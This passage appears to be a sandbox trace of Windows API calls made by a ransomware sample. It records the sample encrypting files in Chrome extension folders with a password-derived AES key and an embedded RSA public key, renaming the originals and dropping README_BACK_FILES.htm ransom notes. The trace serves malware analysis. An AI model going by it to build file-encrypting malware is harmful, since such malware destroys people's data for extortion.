lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.066] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.066] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.066] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.066] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.066] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.066] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.066] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.066] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.066] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.066] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.066] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x380) returned 1 [0261.066] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x380, lpOverlapped=0x0) returned 1 [0261.066] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bff8*=0x6, lpOverlapped=0x0) returned 1 [0261.067] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x6, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bff8*=0x10) returned 1 [0261.067] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9bff8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bff8*=0x10, lpOverlapped=0x0) returned 1 [0261.067] CloseHandle (hObject=0x5d60) returned 1 [0261.067] CloseHandle (hObject=0x5d64) returned 1 [0261.067] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json"), bFailIfExists=0) returned 1 [0261.070] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json", dwFileAttributes=0x0) returned 1 [0261.070] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.gsg")) returned 1 [0261.071] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\verified_contents.json.fuck")) returned 1 [0261.072] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0261.072] CryptDestroyKey (hKey=0x2e7ce40) returned 1 [0261.072] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0261.072] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0 [0261.073] FindClose (in: hFindFile=0x2e7fc00 | out: hFindFile=0x2e7fc00) returned 1 [0261.073] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\readme_back_files.htm")) returned 0xffffffff [0261.073] AreFileApisANSI () returned 1 [0261.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 151 [0261.073] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_metadata\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d268, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0261.073] GetFileType (hFile=0x5d50) returned 0x1 [0261.074] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9beb4*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9beac, lpOverlapped=0x0 | out: lpBuffer=0x2b9beb4*, lpNumberOfBytesWritten=0x2b9beac*=0x5ec, lpOverlapped=0x0) returned 1 [0261.074] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0 [0261.074] FindClose (in: hFindFile=0x2e7fbc0 | out: hFindFile=0x2e7fbc0) returned 1 [0261.075] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\readme_back_files.htm")) returned 0xffffffff [0261.075] AreFileApisANSI () returned 1 [0261.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2eb4ef0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 141 [0261.075] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d604, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0261.075] GetFileType (hFile=0x5d4c) returned 0x1 [0261.075] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9c250*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c248, lpOverlapped=0x0 | out: lpBuffer=0x2b9c250*, lpNumberOfBytesWritten=0x2b9c248*=0x5ec, lpOverlapped=0x0) returned 1 [0261.076] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0 [0261.076] FindClose (in: hFindFile=0x2e7fb00 | out: hFindFile=0x2e7fb00) returned 1 [0261.076] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\readme_back_files.htm")) returned 0xffffffff [0261.077] AreFileApisANSI () returned 1 [0261.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2eb4440, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 135 [0261.077] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9d9a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0261.078] GetFileType (hFile=0x5d40) returned 0x1 [0261.078] WriteFile (in: hFile=0x5d40, lpBuffer=0x2b9c5ec*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9c5e4, lpOverlapped=0x0 | out: lpBuffer=0x2b9c5ec*, lpNumberOfBytesWritten=0x2b9c5e4*=0x5ec, lpOverlapped=0x0) returned 1 [0261.079] FindNextFileA (in: hFindFile=0x29388b8, lpFindFileData=0x2b9dbb8 | out: lpFindFileData=0x2b9dbb8) returned 1 [0261.079] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\*.*", lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 0x2e7fb00 [0261.080] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0261.080] FindNextFileA (in: hFindFile=0x2e7fb00, lpFindFileData=0x2b9d81c | out: lpFindFileData=0x2b9d81c) returned 1 [0261.080] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\*.*", lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 0x2e7fbc0 [0261.081] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0261.082] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0261.082] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0261.082] GetLastError () returned 0x0 [0261.082] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js")) returned 0x20 [0261.083] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js", dwFileAttributes=0x80) returned 1 [0261.083] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0261.084] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0261.085] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\angular.js.gsg", dwFileAttributes=0x2) returned 1 [0261.086] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e7a500) returned 1 [0261.087] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0261.088] lstrlenA (lpString="yhIePWeHCpPAWIDQWkbMuMJxzMlQm") returned 29 [0261.088] CryptHashData (hHash=0x2e7fc00, pbData=0x28cb530, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0261.088] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc00, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e7fd40) returned 1 [0261.088] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0261.088] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0261.088] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e7b4f0) returned 1 [0261.088] CryptImportPublicKeyInfo (in: hCryptProv=0x2e7b4f0, dwCertEncodingType=0x1, pInfo=0x2eabc90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eabcc0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eabcc8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e7ce40) returned 1 [0261.088] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0261.088] CryptEncrypt (in: hKey=0x2e7ce40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e710c8*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e710c8*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0261.088] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e710c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e710c8*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0261.089] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.103] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.104] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.105] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.105] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.105] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.105] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.105] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.105] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.105] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.105] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.105] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.105] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.107] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.107] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.107] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.107] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.107] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.107] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.107] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.107] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.107] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.107] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.107] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.107] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.108] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.108] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.108] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.108] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0261.108] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.108] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0261.108] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, 